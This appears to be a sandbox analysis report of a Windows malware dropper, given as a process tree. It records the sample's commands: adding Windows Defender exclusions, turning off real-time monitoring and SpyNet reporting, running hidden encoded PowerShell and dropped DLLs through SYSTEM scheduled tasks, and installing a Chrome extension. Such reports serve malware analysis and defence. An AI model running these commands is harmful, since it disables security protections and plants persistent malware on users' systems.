C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2024
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:812
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1444
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1104
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gyxQJwUvS" /SC once /ST 08:43:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gyxQJwUvS"4⤵PID:616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gyxQJwUvS"4⤵PID:2000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bsajrHInQFlcwYICLj" /SC once /ST 10:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\XXlxCEo.exe\" yn /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1356
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {2CCBBF4E-408F-4316-8BEF-6E3882ADB62C} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:1644
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1016
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:852
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1472
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1112
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1456
-
C:\Windows\system32\taskeng.exetaskeng.exe {3A54EB8F-8BD6-4176-9E74-7CB7F748CF2C} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1500
-
C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\XXlxCEo.exeC:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC\nuKOVfXXHsnqFlD\XXlxCEo.exe yn /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1956 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grUAYCuXF" /SC once /ST 08:06:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grUAYCuXF"3⤵PID:1548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grUAYCuXF"3⤵PID:1456
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2044
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1868
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1544
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNqNItRBX" /SC once /ST 09:36:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNqNItRBX"3⤵PID:680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNqNItRBX"3⤵PID:456
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:323⤵PID:1880
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:643⤵PID:436
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:323⤵PID:1632
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:324⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:643⤵PID:516
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:644⤵PID:544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\dDIGKoNsMZUYTlNI\oIQqpkQx\vhWuIUfWtouWEazJ.wsf"3⤵PID:1468
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\dDIGKoNsMZUYTlNI\oIQqpkQx\vhWuIUfWtouWEazJ.wsf"3⤵
- Modifies data under HKEY_USERS
PID:844 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hRSVwMivPDBwjMVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hRSVwMivPDBwjMVB" /t REG_DWORD /d 0 /reg:644⤵PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:324⤵PID:824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JuPVqtTuU" /t REG_DWORD /d 0 /reg:644⤵PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:324⤵PID:616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NCzfTsUHwfUn" /t REG_DWORD /d 0 /reg:644⤵PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:324⤵PID:612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\phVJOPZyZJOU2" /t REG_DWORD /d 0 /reg:644⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:324⤵PID:1940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR" /t REG_DWORD /d 0 /reg:644⤵PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:324⤵PID:1880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRZxVByAcqfAC" /t REG_DWORD /d 0 /reg:644⤵PID:1440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hRSVwMivPDBwjMVB" /t REG_DWORD /d 0 /reg:324⤵PID:1776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hRSVwMivPDBwjMVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC" /t REG_DWORD /d 0 /reg:324⤵PID:556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC" /t REG_DWORD /d 0 /reg:644⤵PID:812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:324⤵PID:956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dDIGKoNsMZUYTlNI" /t REG_DWORD /d 0 /reg:644⤵PID:2032
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gIPehHFXk" /SC once /ST 01:49:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gIPehHFXk"3⤵PID:1528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gIPehHFXk"3⤵PID:1620
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:916
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1776
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2000
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ygwXmmYWmIOQZqgey" /SC once /ST 00:12:51 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\DIgdmmJ.exe\" c9 /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ygwXmmYWmIOQZqgey"3⤵PID:1924
-
-
-
C:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\DIgdmmJ.exeC:\Windows\Temp\dDIGKoNsMZUYTlNI\cbiAkEIOWvTrFua\DIgdmmJ.exe c9 /site_id 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1044 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bsajrHInQFlcwYICLj"3⤵PID:812
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1356
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2032
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:824
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JuPVqtTuU\XqBJAR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HnhGGmYUcuANzZs" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HnhGGmYUcuANzZs2" /F /xml "C:\Program Files (x86)\JuPVqtTuU\yAawgAz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "HnhGGmYUcuANzZs"3⤵PID:564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "HnhGGmYUcuANzZs"3⤵PID:1060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qwZMgdHJPwAVJo" /F /xml "C:\Program Files (x86)\phVJOPZyZJOU2\FBIXlpX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fSwSvvnEEoVJd2" /F /xml "C:\ProgramData\hRSVwMivPDBwjMVB\BpVoGuV.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mBqqQEpEndyJZOmyy2" /F /xml "C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\dgoNAPG.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IGrzNxCjwBhGmyGrIyA2" /F /xml "C:\Program Files (x86)\wRZxVByAcqfAC\wJaHoYc.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ClHbhijVssadMpWzU" /SC once /ST 07:02:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dDIGKoNsMZUYTlNI\goYPkxTb\FtPPZcf.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1096
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ClHbhijVssadMpWzU"3⤵PID:1924
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1976
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1092
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ygwXmmYWmIOQZqgey"3⤵PID:1168
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dDIGKoNsMZUYTlNI\goYPkxTb\FtPPZcf.dll",#1 /site_id 5254032⤵PID:536
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dDIGKoNsMZUYTlNI\goYPkxTb\FtPPZcf.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2016 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ClHbhijVssadMpWzU"4⤵PID:1428
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1208
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1580
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1864
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD537e3730e43a1c8f0d93c94962ed12307
SHA176cc96b312cc72658e4a8526598e0efedb32f03a
SHA2562b60c7f92b35ba40538cbddc6592e6300a9016c11522417b4eb60ed4a0c4555f
